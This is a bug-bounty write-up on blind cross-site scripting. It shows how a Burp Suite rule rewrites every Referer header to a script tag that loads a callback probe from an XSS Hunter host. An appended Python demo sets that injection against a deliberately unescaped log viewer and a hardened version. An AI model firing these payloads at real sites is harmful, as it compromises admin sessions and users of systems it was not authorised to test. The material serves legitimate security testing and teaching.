Today I want to share a Blind XSS that I found on a private site. In this write-up I will explain how I found it and the methodology I used.
Blind XSS is a flavor of cross-site scripting (XSS) in which the attacker "blindly" submits a series of malicious payloads to input points that are likely to be stored persistently (for example in a database or in a log) and rendered later in a page the attacker never sees, such as an internal admin panel, a log viewer or a support dashboard. Because the payload fires in someone else's browser, possibly hours or days later, the attacker only learns about it if the payload calls back to a server they control.
Currently I use XSS Hunter (the web version) to find Blind XSS.
XSS Hunter is a recently launched platform that makes pen testing for XSS vulnerabilities much easier to monitor and organize. Through it you can launch all kinds of XSS attacks, but where it really shines is in carrying out a Blind XSS attack: each payload loads a probe script from your personal xss.ht subdomain, and when it runs, XSS Hunter records where it fired and notifies you.
Blind XSS for beginners
I get a lot of DMs on Twitter asking questions about Blind XSS, like which tool to use and how to register on XSS Hunter…
Step 1: In Burp Suite's Proxy "Match and Replace" settings, create a new rule, as none of the pre-defined ones does what we need: click "Add", and you'll see the new rule dialogue appear. Click the "Type" drop-down and select "Request header".
Then, add ^Referer.*$ as the "Match" criteria. This string is a regular expression that matches any header line that starts with Referer. As there should be at most one such header in a request, a simple match is all we need; the rule replaces the whole header line, so the replacement must include the header name again.
Next, set the "Replace" text to Referer: "><script src=https://newone.xss.ht></script> (newone is my xss.ht subdomain; use your own, and make sure the quote is a straight ASCII double quote). Then, check the "Regex match" checkbox and click "OK". Keep in mind that the rule applies to every request passing through the proxy and overwrites the legitimate Referer, which can break flows that check it, so enable it only while browsing in-scope hosts. Also note that the rule only fires on requests that already carry a Referer header; a request without one is left untouched.
(This is exactly what a Match and Replace rule is for: when you're testing web applications, sometimes you want to automatically change some part (or parts) of the request…)
Step 2: When the next request is intercepted, the "Raw" request view shows that the Referer header has been replaced with Referer: "><script src=https://newone.xss.ht></script>, as in the image below.
Step 3: A few hours later, when I went back to XSS Hunter, it showed that the blind XSS payload had fired. The report includes the URL of the page where it executed, which is what tells you which back-end page (for example a log viewer or analytics panel) renders the stored Referer without escaping it, together with the DOM and a screenshot you can attach to the bug report.
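The following is an added example, not code from the original write-up or from Burp Suite or XSS Hunter. It puts both halves of the technique described above into runnable form: the Burp rule from Step 1 emulated as a regex rewrite of a raw HTTP request (so you can see exactly what ^Referer.*$ matches and what the replacement line looks like), and the kind of sink that makes the payload from the definition paragraph fire, a log viewer that drops the stored Referer into an href by string concatenation, shown next to a hardened version. The request, the shop.example host and the log viewer are constructed for illustration; the newone.xss.ht subdomain is the author's and should be replaced with your own.

```python
import re
import html
from typing import Optional

# The XSS Hunter payload used in the write-up. The subdomain is the author's;
# substitute your own xss.ht subdomain before using this.
PAYLOAD = '"><script src=https://newone.xss.ht></script>'

# Constructed sample request (not captured from any real target). The Referer
# is the kind of value that back-end analytics or log viewers store and render.
RAW_REQUEST = (
    "GET /search?q=laptop HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://shop.example/category/electronics\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Same expression as the Burp "Match" field. Burp evaluates request-header
# rules one header line at a time; re.MULTILINE gives the same per-line
# anchoring of ^ and $ over a whole raw request.
REFERER_RE = re.compile(r"^Referer.*$", re.MULTILINE)


def inject_referer(raw_request: str, payload: str = PAYLOAD) -> str:
    """Emulate the Step 1 rule: replace the entire Referer header line.

    Only the header block is touched; the body after the blank line is left
    alone. A request with no Referer header is returned unchanged, which is
    also what the Burp rule does, since there is nothing to match.
    """
    head, sep, body = raw_request.partition("\r\n\r\n")
    # Work on \n-separated lines so that `.*` cannot swallow the \r of a CRLF.
    head = head.replace("\r\n", "\n")
    # A callable replacement avoids backslash processing of the payload text.
    new_head = REFERER_RE.sub(lambda m: f"Referer: {payload}", head, count=1)
    return new_head.replace("\n", "\r\n") + sep + body


def parse_referer(raw_request: str) -> Optional[str]:
    """What a naive server-side logger stores: the raw Referer header value."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "referer":
            return value.strip()
    return None


def render_log_row_vulnerable(referer: str) -> str:
    """Hypothetical internal log viewer that builds HTML by concatenation.

    The stored value lands inside a double-quoted href. A value starting with
    "> closes the attribute and the <a> tag, so the <script> that follows
    becomes a real element and the probe from xss.ht is loaded.
    """
    return f'<tr><td><a href="{referer}">{referer}</a></td></tr>'


def render_log_row_fixed(referer: str) -> str:
    """Hardened row: escape for attribute and text context, and only link
    values that are actually http(s) URLs, so a non-URL value is plain text."""
    safe = html.escape(referer, quote=True)
    if referer.lower().startswith(("http://", "https://")):
        return f'<tr><td><a href="{safe}">{safe}</a></td></tr>'
    return f"<tr><td>{safe}</td></tr>"


def contains_script_tag(rendered_html: str) -> bool:
    """Crude stand-in for a browser: is there a real <script src=...> element?"""
    return re.search(r"<script\b[^>]*src=", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    tampered = inject_referer(RAW_REQUEST)
    print(tampered)
    stored = parse_referer(tampered)
    print("vulnerable:", render_log_row_vulnerable(stored))
    print("fixed:     ", render_log_row_fixed(stored))
```

Running it prints the rewritten request, then the two renderings of the stored value: the vulnerable row contains a live script element, the fixed row contains only &lt;script&gt; text. The scheme check in the hardened version matters beyond this payload: escaping alone would still let a stored javascript: URL become a clickable link.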